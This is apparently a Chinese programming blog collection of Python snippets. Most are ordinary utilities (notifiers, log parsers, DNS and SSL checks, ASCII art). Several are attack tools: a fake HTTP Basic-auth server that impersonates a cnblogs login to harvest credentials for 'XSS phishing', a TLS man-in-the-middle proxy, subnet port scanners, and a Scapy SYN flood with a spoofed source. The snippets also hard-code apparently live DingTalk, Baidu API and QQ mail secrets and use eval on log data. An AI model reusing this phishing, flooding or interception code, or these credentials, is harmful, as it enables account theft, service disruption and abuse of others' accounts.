封装钉钉通知接口: 接口的调用需要传入需要通知特定人的手机号,调用后会在顶顶群内通知.
import requestsimport urllib.parseimport time,hmac,hashlib,base64,jsonclass DingToken (): def __init__ (self,atAll,atMobiles ): self.atAll = atAll self.atMobiles = atMobiles def send_message (self,message ): timestamp = str (round (time.time() * 1000 )) secret = 'SEC1018485caf7339e38530b4923ef3cfa164d03af6a79105af0013246048479bf1' secret_enc = secret.encode('utf-8' ) string_to_sign = '{}\n{}' .format (timestamp, secret) string_to_sign_enc = string_to_sign.encode('utf-8' ) hmac_code = hmac.new(secret_enc, string_to_sign_enc, digestmod=hashlib.sha256).digest() sign = urllib.parse.quote(base64.b64encode(hmac_code)) headers={'Content-Type' : 'application/json' } webhook = 'https://oapi.dingtalk.com/robot/send?access_token=0fe10f5f4e8dd74e6b90afb2f74b2b8a8aaa3bf246dccfead9d7395a56fae586×tamp=' + timestamp + "&sign=" + sign data = { "msgtype" : "text" , "text" : {"content" : message }, "at" : { "atMobiles" : [ self.atMobiles ], "isAtAll" : self.atAll } } requests.post(webhook, data=json.dumps(data), headers=headers) def send_warning (self,platform,address,send_date,message ): self.send_message( "------------------------------------------------------- \n" "\t {0} \n" "------------------------------------------------------- \n" "系统地址: \t {1} \n" "告警日期: \t {2} \n" "------------------------------------------------------- \n" "{3}" "-------------------------------------------------------" . format (platform,address,send_date,message) ) if __name__ == "__main__" : ding = DingToken(False ,"15646596977" ) ding.send_warning("总部客服(呼叫中心)" ,"192.168.1.1" ,"2021:01:01" ,"hello lyshark \n" )
计算范围时间戳: 编程实现在日志文件中提取出指定时间之内对应系统数据,用于通过时间戳定位时间区间.
import sys,os,timeimport logging,datetimedef Write_Dictionaries (LogName,Dict ): logging.basicConfig(level=logging.DEBUG, format = "%(created)d --> %(levelname)s --> %(asctime)s --> %(message)s" , datefmt = "%Y-%m-%d %H:%M:%S" , filename = LogName, filemode = "a+" ) logging.info(str (Dict )) def Read_Dictionaries (LogName,Start_Time,End_Time ): find_time_stamp = [] with open (LogName,"r" ,encoding="utf-8" ) as fp: start = int (time.mktime(time.strptime(Start_Time,"%Y-%m-%d %H:%M:%S" ))) end = int (time.mktime(time.strptime(End_Time,"%Y-%m-%d %H:%M:%S" ))) for item in fp: data = item.split(" --> " ) if int (data[0 ]) >= start and int (data[0 ]) <= end: find_dict = eval (data[3 ].replace("\n" ,"" )) find_time_stamp.append(find_dict) return find_time_stamp if __name__ == "__main__" : for item in range (1 ,0 ): dic = {"Address" : "192.168.1.1" , "CPU" : str (item), "MEM" : str (item*10 ), "IO" : str (item/2 )} Write_Dictionaries("addr.log" ,dic) time.sleep(1 ) print ("写入内容: {}" .format (dic)) find_dict = Read_Dictionaries("addr.log" ,"2020-03-19 16:10:43" ,"2020-03-19 16:10:54" ) for item in find_dict: print ("IP地址: {} CPU负载: {}" .format (item.get("Address" ),item.get("CPU" )))
两个文本差异比对: 使用Python内置的模块就可以完成两个文件的差异比对,最后生成html表格方便展示.
import difflibimport argparseimport sysdef readfile (filename ): try : with open (filename, 'r' ) as fileHandle: text = fileHandle.read().splitlines() return text except IOError as e: print ("Read file Error:" , e) sys.exit() def diff_file (filename1, filename2 ): text1_lines = readfile(filename1) text2_lines = readfile(filename2) d = difflib.HtmlDiff() result = d.make_file(text1_lines, text2_lines, filename1, filename2, context=True ) with open ('result.html' , 'w' ) as resultfile: resultfile.write(result) if __name__ == '__main__' : parser = argparse.ArgumentParser(description="传入两个文件参数" ) parser.add_argument('-f1' , action='store' , dest='filename1' , required=True ) parser.add_argument('-f2' , action='store' , dest='filename2' , required=True ) given_args = parser.parse_args() filename1 = given_args.filename1 filename2 = given_args.filename2 diff_file(filename1, filename2)
计算指定网段IP数量: 例如输入网段192.168.1.1/100则计算出这个网段范围内的所有主机数.
import osdef CalculationIP (Addr_Count ): ret = [] try : IP_Start = str (Addr_Count.split("/" )[0 ]).split("." ) IP_Heads = str (IP_Start[0 ] + "." + IP_Start[1 ] + "." + IP_Start[2 ] +"." ) IP_Start_Range = int (Addr_Count.split("." )[3 ].split("/" )[0 ]) IP_End_Range = int (Addr_Count.split("/" )[1 ]) for item in range (IP_Start_Range,IP_End_Range+1 ): ret.append(IP_Heads+str (item)) return ret except Exception: return 0 if __name__ == "__main__" : ret = CalculationIP("192.168.1.1/100" ) for item in range (len (ret)): print ("地址范围内的所有IP: {}" .format (ret[item]))
使用PSutil库提取数据: 通过使用第三方工具库,提取出系统中的网络连接请求与进程线程的详细数据.
import psutildef GetNetwork (): network = psutil.net_io_counters(pernic=True ,nowrap=True ) for each in network.keys(): print ("[*] 网卡: %-35s 发送/接收字节: %s/%s 发送/接收包数量: %s/%s" %(each,network[each].bytes_sent,network[each].bytes_recv, network[each].packets_sent,network[each].packets_recv)) def GetNetworkLink (): network = psutil.net_connections(kind="tcp" ) AllowData = [] for each in network: src_addr,src_port = each.laddr.ip,each.laddr.port src_stats = each.status src_pid = each.pid if src_stats in ["ESTABLISHED" ,"LISTEN" ]: process = psutil.Process(src_pid) print ("[+] IP地址: %15s:%-5s PID: %5s 名称: %-10s" %(src_addr,src_port,src_pid,process.name())) AllowData.append([process.name(),src_port]) return AllowData def GetProcessID (): for each in psutil.pids(): p = psutil.Process(int (each)) print ("-" * 100 ) print ("进程: %25s 线程数: %5s 内存利用率:%3s 进程创建时间: %-20s" %(p.name(),p.num_threads(),int (p.memory_percent()),p.create_time())) print ("-" * 100 ) print ("CPU时间信息: {}" .format (p.cpu_times())) print ("MEM内存信息: {}" .format (p.memory_info())) print ("进程IO读写参数: {}" .format (p.io_counters())) print ("进程对外SOCKET: {}" .format (p.connections())) print ("\r" *100 )
简单实现密码登录验证: 在不使用数据库的情况下完成密码验证,密码的hash值对应的是123123
import os,timeimport hashlibdb = [ {"user" :"admin" ,"pass" :"4297f44b13955235245b2497399d7a93" ,"Flag" :"0" }, {"user" :"guest" ,"pass" :"4297f44b13955235245b2497399d7a93" ,"Flag" :"0" }, {"user" :"lyshark" ,"pass" :"4297f44b13955235245b2497399d7a93" ,"Flag" :"0" } ] def CheckUser (username,password ): hash = hashlib.md5() for i in range (0 ,len (db)): if db[i].get("user" ) == username: if db[i].get("Flag" ) < "5" : hash .update(bytes (password,encoding="utf-8" )) if db[i].get("pass" ) == str (hash .hexdigest()): db[i]['Flag' ] = 0 return 1 else : db[i]['Flag' ] = str (int (db[i]['Flag' ]) + 1 ) return 0 else : print ("用户 {} 被永久限制登录" .format (db[i].get("user" ))) return 0 return 0 while (True ): username = input ("输入用户名: " ) password = input ("输入密码: " ) ret= CheckUser(username,password) print ("登录状态:" ,ret)
SQLite提取数据并绘图 通过使用matplotlib这个库函数,并提取出指定时间的数据记录,然后直接绘制曲线图.
import os,time,datetimeimport sqlite3import numpy as npfrom matplotlib import pyplot as pltdef TimeIndex (db,table,start,ends ): start_time = int (time.mktime(time.strptime(start,"%Y-%m-%d %H:%M:%S" ))) end_time = int (time.mktime(time.strptime(ends,"%Y-%m-%d %H:%M:%S" ))) conn = sqlite3.connect(db) cursor = conn.cursor() select = "select * from {} where time >= {} and time <= {}" .format (table,start_time,end_time) return cursor.execute(select).fetchall() def Display (): temp = TimeIndex("data.db" ,"lyshark" ,"2019-12-12 14:28:00" ,"2019-12-12 14:29:00" ) list = [] for i in range (0 ,len (temp)): list .append(temp[i][1 ]) plt.title("CPU Count" ) plt.plot(list , list ) plt.show() if __name__ == "__main__" : Display()
将图片转为字符图片: 通过pillow图片处理库,对图片进行扫描,然后用特殊字符替换图片的每一个位,生成的字符图片.
from PIL import Imageimport argparsedef get_char (r,g,b,alpha = 256 ): ascii_char = list ("~!@#$%^&*()_+ " ) if alpha == 0 : return " " length = len (ascii_char) gray = int (0.2126 * r + 0.7152 * g + 0.0722 * b) unit = (256.0 + 1 )/length return ascii_char[int (gray/unit)] if __name__ == "__main__" : parser = argparse.ArgumentParser() parser.add_argument("--file" ,dest="file" ,help ="指定一个图片文件" ) parser.add_argument("--width" ,dest="width" ,type =int ,default=50 ,help ="指定图片宽度" ) parser.add_argument("--height" ,dest="height" ,type =int ,default=25 ,help ="指定图片高度" ) args = parser.parse_args() if args.file != None : img = Image.open (args.file) img = img.resize((args.width,args.height), Image.NEAREST) txt = "" for row in range (args.height): for cow in range (args.width): txt += get_char(*img.getpixel((cow,row))) txt += "\n" print (txt) else : parser.print_help()
针对视频转为字符串: 通过opencv库实现对指定MP4文件替换为字符串格式,并播放出来.
import cv2,os,argparsedef PlayCharMP4 (file_name,heigth,width ): ascii_char = list ("~!@#$%^&*()_+/-,.;:'{}[]=qwertyuiokjhgfd" ) char_len = len (ascii_char) vc = cv2.VideoCapture(file_name) if vc.isOpened(): rval,frame = vc.read() else : rval = False frame_count,outputList = 0 ,[] while rval: gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) gray = cv2.resize(gray,(width,heigth)) text = "" for pixel_line in gray: for pixel in pixel_line: text += ascii_char[int (pixel / 256 * char_len )] text += "\n" outputList.append(text) frame_count = frame_count + 1 if frame_count % 100 == 0 : print ("处理视频: " + str (frame_count) + " 帧" ) rval, frame = vc.read() for frame in outputList: os.system("cls" ) print (frame) if __name__ == "__main__" : parser = argparse.ArgumentParser() parser.add_argument("--file" ,dest="file" ,help ="指定一个MP4文件" ) args = parser.parse_args() if args.file != None : PlayCharMP4(args.file,30 ,80 ) else : parser.print_help()
调用百度翻译API: 调用百度翻译API完成翻译任务.
import requestsimport stringimport timeimport hashlibimport json api_url = "http://api.fanyi.baidu.com/api/trans/vip/translate" my_appid = "20220303001108300" cyber = "pZmk93BeezwigjmjkOYS" lower_case = list (string.ascii_lowercase) def requests_for_dst (word ): salt = str (time.time())[:10 ] final_sign = str (my_appid)+word+salt+cyber final_sign = hashlib.md5(final_sign.encode("utf-8" )).hexdigest() if list (word)[0 ] in lower_case: paramas = { 'q' :word, 'from' :'en' , 'to' :'zh' , 'appid' :'%s' %my_appid, 'salt' :'%s' %salt, 'sign' :'%s' %final_sign } my_url = api_url+'?appid=' +str (my_appid)+'&q=' +word+'&from=' +'en' +'&to=' +'zh' +'&salt=' +salt+'&sign=' +final_sign else : paramas = { 'q' :word, 'from' :'zh' , 'to' :'en' , 'appid' :'%s' %my_appid, 'salt' :'%s' %salt, 'sign' :'%s' %final_sign } my_url = api_url+'?appid=' +str (my_appid)+'&q=' +word+'&from=' +'zh' +'&to=' +'en' +'&salt=' +salt+'&sign=' +final_sign response = requests.get(api_url,params = paramas).content content = str (response,encoding = "utf-8" ) json_reads = json.loads(content) print (json_reads['trans_result' ][0 ]['dst' ]) while True : word = input ("输入文本 -> " ) requests_for_dst(word)
统计网站访问日志: 实现统计网站访问日志,并得到字典类型返回值.
import os,jsondef Count_Flag_And_Flow (file ): list = [] flag = {} with open (file) as f: contexts = f.readlines() for line in contexts: it = line.split()[8 ] list .append(it) list_num = set (list ) for item in list_num: num = list .count(item) flag[item] = num return flag def Count_Flag_And_Type (file ): list = [] flag = {} with open (file) as f: contexts = f.readlines() for line in contexts: list .append( line.split()[12 ].replace("(" ,"" ).replace(")" ,"" )) list_num = set (list ) for item in list_num: num = list .count(item) flag[item] = num return flag def Count_Time_And_Flow (file ): times = {} flow = {} Count= 0 with open (file) as f: contexts = f.readlines() for line in contexts: if line.split()[9 ] != "-" and line.split()[9 ] != '"-"' : size = line.split()[9 ] temp = line.split()[3 ] ip_attr = temp.split(":" )[1 ] + ":" + temp.split(":" )[2 ] Count = int (size) + Count if ip_attr in times.keys(): flow[ip_attr] = flow[ip_attr] + int (size) else : times[ip_attr] = 1 flow[ip_attr] = int (size) return flow if __name__ =="__main__" : Address = Count_Flag_And_Flow("d://access.log" ) print (Address) Types = Count_Flag_And_Type("d://access.log" ) print (Types) OutFlow = Count_Time_And_Flow("d://access.log" ) print (OutFlow)
SMTPlib发送邮件: 简单封装一个SMTP邮件发送功能,传值即可直接使用.
import smtplibfrom email.mime.text import MIMETextmail_host = 'smtp.qq.com' mail_user = '1181506874@qq.com' mail_pass = 'wrpmzkalqqvhhijc' def SendMail (sender_user,recivers_user,title,subject,is_ssl = False ): sender = sender_user receivers = [recivers_user] message = MIMEText(subject, 'html' , 'utf-8' ) message['Subject' ] = title message['From' ] = sender message['To' ] = receivers[0 ] try : if is_ssl != True : smtpObj = smtplib.SMTP() smtpObj.connect(mail_host,25 ) smtpObj.login(mail_user,mail_pass) else : smtpObj = smtplib.SMTP() smtpObj.connect(mail_host, 25 ) smtpObj = smtplib.SMTP_SSL(mail_host) smtpObj.login(mail_user, mail_pass) smtpObj.sendmail(sender,receivers,message.as_string()) smtpObj.quit() return True except smtplib.SMTPException as e: return False if __name__ == "__main__" : ref = SendMail("1181506874@qq.com" ,"lysharks@163.com" ,"Flask 邮箱验证码" , "<p>您本次的验证码是: 1Ae3 有效期10分钟. </p><br><br> " "更多内容请访问: <a href='https://www.baidu.com'>www.baidu.com</a>" ,False ) print (ref)
构建简易HTTPBasic认证: Basic认证是由web服务器提供的一种轻便的身份校验方式,此处实现的工具可用于XSS内嵌钓鱼.
import socketserverimport http.serverclass RequestHandler (http.server.SimpleHTTPRequestHandler): def do_GET (self ): if str (self.headers).find('UserLogin=1' ) > 0 : self.send_response(302 ) self.send_header('Location' , 'https://account.cnblogs.com/signin' ) self.end_headers() else : if str (self.headers).find('Authorization: Basic ' ) > 0 : self.send_response(302 ) self.send_header('Set-Cookie' , 'UserLogin=1' ) self.send_header('Location' , 'https://account.cnblogs.com/signin' ) print ("------------------------------------------------------------" ) print (str (self.headers)) else : self.send_response(401 ) self.send_header('Content-type' , 'text/html; charset=UTF-8' ) self.send_header('WWW-Authenticate' , 'Basic realm="Session Out Of Date, Please Login again [account.cnblogs.com]"' ) self.end_headers() httpd = socketserver.TCPServer(("0.0.0.0" , 9999 ), RequestHandler) httpd.serve_forever()
获取DNS证书时间: 通过使用SSL
类我们可以直接对一个网站解析出其SSL证书信息.
import ssl,sys,socketdef GetSSL_DNS (hostname ): host=str (hostname).rstrip().lstrip() try : ctx = ssl.create_default_context() sock = ctx.wrap_socket(socket.socket(), server_hostname=hostname) sock.settimeout(5 ) sock.connect((host, 443 )) crt = sock.getpeercert() print ("组织单位: {}" .format (crt["subject" ][2 ][0 ][1 ])) print ("通用名: {}" .format (crt["issuer" ][2 ][0 ][1 ])) print ("序列号: {}" .format (crt["serialNumber" ])) print ("起始时间: {} " .format (crt["notBefore" ])) print ("终止时间: {} " .format (crt["notAfter" ])) print ('-------- 针对域名 {} DNS的列表 --------' .format (hostname)) for item in crt['subjectAltName' ]: print ("DNS: {}" .format (item[1 ])) except Exception: pass if __name__ == "__main__" : try : if sys.argv[1 ]: GetSSL_DNS(sys.argv[1 ]) except Exception: print ("[-] 请输入一个域名: baidu.com" ) pass
DNS模块查域名解析: 使用 DNS-Python 这个模块来查询特定的一个或一组域名的所有解析记录.
import osimport dns.resolverfrom collections import defaultdictdomain = "baidu.com" A = dns.resolver.query(domain,"A" ) for x in A.response.answer: for y in x.items: print ("查询到A记录:{} " .format (y)) print ("*" *50 )MX = dns.resolver.query(domain,"MX" ) for x in MX: print ("MX交换数值 {} MX记录:{} " .format (x.preference,x.exchange)) print ("*" *50 )NS = dns.resolver.query(domain,"NS" ) for x in NS.response.answer: for y in x.items: print ("NS名称服务:{} " .format (y.to_text())) hosts = ["baidu.com" ,"weibo.com" ,"sina.com" ] IP_List = defaultdict(list ) def query (hosts ): for host in hosts: ip = dns.resolver.query(host,"A" ) for i in ip: IP_List[host].append(i) return IP_List for i in query(hosts): print (i,IP_List[i])
解析HTTP服务状态: 通过调用pycurl模块对指定的Web服务器进行健康状态监测.
import pycurl,certififrom io import BytesIOheaders = ['Accept:*/*' ,'User-Agent:Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0' ] def header_function (header_line ): header_line = header_line.decode("utf-8" ) class ex_response (object ): def __init__ (self,url ): self.buffer = BytesIO() self.c = pycurl.Curl() self.c.setopt(pycurl.URL,url) self.c.setopt(pycurl.CAINFO,certifi.where()) self.c.setopt(pycurl.WRITEDATA, self.buffer) self.c.setopt(pycurl.WRITEHEADER,self.buffer) self.c.setopt(self.c.HTTPHEADER,headers) self.c.setopt(pycurl.HEADERFUNCTION, header_function) try : self.c.perform() except Exception: self.buffer.close() self.c.close() def getinfo (self ): h1 = self.c.getinfo(pycurl.HTTP_CODE) h2 = self.c.getinfo(pycurl.TOTAL_TIME) h3 = self.c.getinfo(pycurl.NAMELOOKUP_TIME) h4 = self.c.getinfo(pycurl.CONNECT_TIME) h5 = self.c.getinfo(pycurl.PRETRANSFER_TIME) h6 = self.c.getinfo(pycurl.STARTTRANSFER_TIME) h7 = self.c.getinfo(pycurl.REDIRECT_TIME) h8 = self.c.getinfo(pycurl.SIZE_UPLOAD) h9 = self.c.getinfo(pycurl.SIZE_DOWNLOAD) h10 = self.c.getinfo(pycurl.SPEED_DOWNLOAD) h11 = self.c.getinfo(pycurl.SPEED_UPLOAD) h12 = self.c.getinfo(pycurl.HEADER_SIZE) info =''' http状态码:%s 传输结束总时间:%.2f ms DNS解析时间:%.2f ms 建立连接时间:%.2f ms 准备传输时间:%.2f ms 传输开始时间:%.2f ms 重定向时间:%.2f ms 上传数据包大小:%d bytes/s 下载数据包大小:%d bytes/s 平均下载速度:%d bytes/s 平均上传速度:%d bytes/s http头文件大小:%d byte ''' %(h1,h2*1000 ,h3*1000 ,h4*1000 ,h5*1000 ,h6*1000 ,h7*1000 ,h8,h9,h10,h11,h12) print (info) self.buffer.close() self.c.close() if __name__ == "__main__" : curl_respon = ex_response("https://www.baidu.com" ) curl_respon.getinfo()
模拟Proxy实现MITM: 假设已经获取server端和客户端的证书,此脚本可以伪造客户端和服务端,实现MITM的场景。
import socketimport sslimport threadingimport queueimport timefromCliQueue = queue.Queue() fromSrvQueue = queue.Queue() sFlag = False class proxyClient (threading.Thread): def __init__ (self ): threading.Thread.__init__(self) self.sock = None self.ssl_context = ssl.create_default_context(cafile='RootCA.pem' ) self.ssl_context.load_cert_chain("Client.pem" , "Client.key" ) self.ssl_context.protocol = ssl.PROTOCOL_TLSv1_2 self.ssl_context.check_hostname = False def run (self ): global fromCliQueue global fromSrvQueue while True : if not fromCliQueue.empty(): if self.sock is None : self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0 ) self.sock.connect(('127.0.0.1' , 9999 )) else : sdata = fromCliQueue.get() print ("[proxyClient]send to server: {}" .format (sdata)) self.sock.send(sdata) rdata = self.sock.recv(4096 ) if rdata != b'' : print ("[proxyClient]recv from server: {}" .format (rdata)) fromSrvQueue.put(rdata) self.sslDetected(rdata) def sslDetected (self, data ): if b'\x01\x00\x00\x00' in data: self.sock = self.ssl_context.wrap_socket(self.sock) print ("[proxyClient]ssl neogotiation" ) return True else : return False class proxyServer (threading.Thread): def __init__ (self ): threading.Thread.__init__(self) self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0 ) self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1 ) self.sock.bind(('127.0.0.1' ,8888 )) self.sock.listen(1 ) self.ssl_context = ssl.SSLContext() self.ssl_context.load_verify_locations(cafile='RootCA.pem' ) self.ssl_context.protocol = ssl.PROTOCOL_TLS_SERVER self.ssl_context.load_cert_chain("Server.pem" , "Server.key" ) def run (self ): global fromSrvQueue global fromCliQueue self.proxySocket, addr = self.sock.accept() while self.proxySocket: rdata = self.proxySocket.recv(4096 ) if rdata != b'' : print ("[proxyServer]recv from client: {}" .format (rdata)) fromCliQueue.put(rdata) while True : if fromSrvQueue.empty(): time.sleep(1 ) continue else : sdata = fromSrvQueue.get() print ("[proxyServer]send to client: {}" .format (sdata)) self.proxySocket.send(sdata) self.sslDetected(sdata) break ; def sslDetected (self, data ): if b'\x01\x00\x00\x00' in data: self.proxySocket = self.ssl_context.wrap_socket(self.proxySocket, server_side=True ) print ("[proxyClient]ssl neogotiation" ) return True else : return False if __name__ == "__main__" : proxyCli = proxyClient() proxyCli.daemon = True proxyCli.start() proxySrv = proxyServer() proxySrv.daemon = True proxySrv.start() proxySrv.join()
计算ICMP校验和: 校验和的目的是计算数据包完整性,防止数据包被非法损坏, 在ICMP数据包发送时,会自动计算校验和并将其设置到ICMP报文中,在目标设备收到后再次计算校验和,并与数据包中的校验和作比较,从而判断该ICMP包是否正常.
import os,sysdef icmp_chesksum (message ): length = len (message) sum_number_count = 0 mold_taking = length % 2 for i in range (0 , length - mold_taking, 2 ): sum_number_count += ord (message[i]) + (ord (message[i + 1 ]) << 8 ) if mold_taking: sum_number_count += ord (message[-1 ]) sum_number_count = (sum_number_count >> 16 ) + (sum_number_count & 0xffff ) sum_number_count += (sum_number_count >> 16 ) answer = ~sum_number_count & 0xffff answer = answer >> 8 | (answer << 8 & 0xff00 ) return answer def get_check_sum (): type = "\x08" code = "\x00" checksum = "\x00\x00" id = "\x00\x01" sequece = "\x00\x01" body = "abcdefghijklmnopqrstuvwabcdefghi" icmp_message = type + code + checksum + id + sequece + body ref = icmp_chesksum(icmp_message) return ref if __name__ == "__main__" : checksum = get_check_sum() print ("十进制校验和: {:d}" .format (checksum))
发送ICMP原始数据包: 接着就是来实现构建并发送socket.SOCK_RAW
原始数据包,发送的实现细节与上方解包原理完全一致.
import socket,timedef raw_socket (dst_addr,imcp_packet ): rawsocket = socket.socket(socket.AF_INET,socket.SOCK_RAW,socket.getprotobyname("icmp" )) send_request_time = time.time() rawsocket.sendto(imcp_packet,(dst_addr,80 )) return send_request_time,rawsocket,dst_addr if __name__ == "__main__" : send_request_time,rawsocket,dst_addr = raw_socket("8.141.58.64" ,bytes ("hello lyshark" ,encoding="utf-8" )) print ("发送时间戳: {} --> 发送IP: {} --> 数据包句柄: {}" .format (send_request_time,dst_addr,rawsocket))
寻找内网路由地址: 除了设置socket.SOCK_RAW
原始数据包模式外,Python还可以设置socket.SOCK_STREAM
数据流模式,使用该模式还可实现扫描内网分布主机情况.
例如: 通过本地网段计算出C段IP地址,然后调用Check方法扫描目标网段内是否存在80端口开放的主机.
import socket,threadingrouters = [] lock = threading.Lock() def search_router (): all_thread = [] local_ip = socket.gethostbyname_ex(socket.gethostname())[2 ] print ("本地接口: " + str (local_ip)) for ip in local_ip: for i in range (1 , 255 ): array = ip.split('.' ) array[3 ] = str (i) addr = '.' .join(array) thread = threading.Thread(target=check, args=(addr,)) thread.start() all_thread.append(thread) for item in all_thread: item.join() def check (addr ): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(1 ) result = sock.connect_ex((addr, 80 )) sock.close() if result == 0 : lock.acquire() print ("该网段路由器可能是: {}" .format (addr)) routers.append((addr, 80 )) lock.release() if __name__ == "__main__" : search_router()
Nmap 搜索网段主机并绘图: 首先电脑中必须安装Nmap,然后使用如下脚本统计内网主机数,并最后绘制饼图展示.
import os,nmap,timeimport numpy as npfrom matplotlib.pylab import *def ScanPort (addr ): port =[] flag = {} dic = {"WebServer" :0 ,"MySQL" :0 ,"SSH" :0 ,"MSSQL" :0 ,"FTP" :0 ,"Danger" :0 } Nmap = nmap.PortScanner() try : ret = Nmap.scan(hosts=addr,arguments="-PS" ) for item in Nmap.all_hosts(): try : temp = list (ret["scan" ][item]["tcp" ].keys()) print ("[*] IP地址: %12s 开放端口: %s" %(item,temp)) port.extend(temp) except Exception: pass except Exception: print ("[-] Nmap 端口扫描异常,程序被迫终止." ) exit(0 ) list_num = set (port) for item in list_num: num = int (port.count(item)) flag[item] = num dic["WebServer" ] = flag.get(80 ) dic["MySQL" ] = flag.get(3306 ) dic["SSH" ] = flag.get(22 ) dic["MSSQL" ] = flag.get(1433 ) dic["FTP" ] = flag.get(21 ) dic["Danger" ] = flag.get(135 ) + flag.get(139 ) + flag.get(445 ) print ("[+] 服务统计: {}" .format (dic)) mpl.rcParams["font.sans-serif" ] = ["KaiTi" ] label = list (dic.keys()) fracs = list (dic.values()) plt.axes(aspect=1 ) plt.pie(x=fracs,labels=label,autopct="%0d%%" ) plt.savefig("scan.png" ) if __name__ == "__main__" : ScanPort("192.168.1.0/24" )
使用Scapy制造SYN洪泛攻击: 使用Scapy制造一些再有TCP协议层的IP数据包,让这些包TCP源端口不断地自增一,而目的TCP端口513不变。
from scapy.all import *def synFlood (src, tgt ): for sport in range (1024 , 65535 ): IPlayer = IP(src=src, dst=tgt) TCPlayer = TCP(sport=sport, dport=513 ) pkt = IPlayer / TCPlayer send(pkt) src = "192.168.220.132" tgt = "192.168.220.128" synFlood(src, tgt)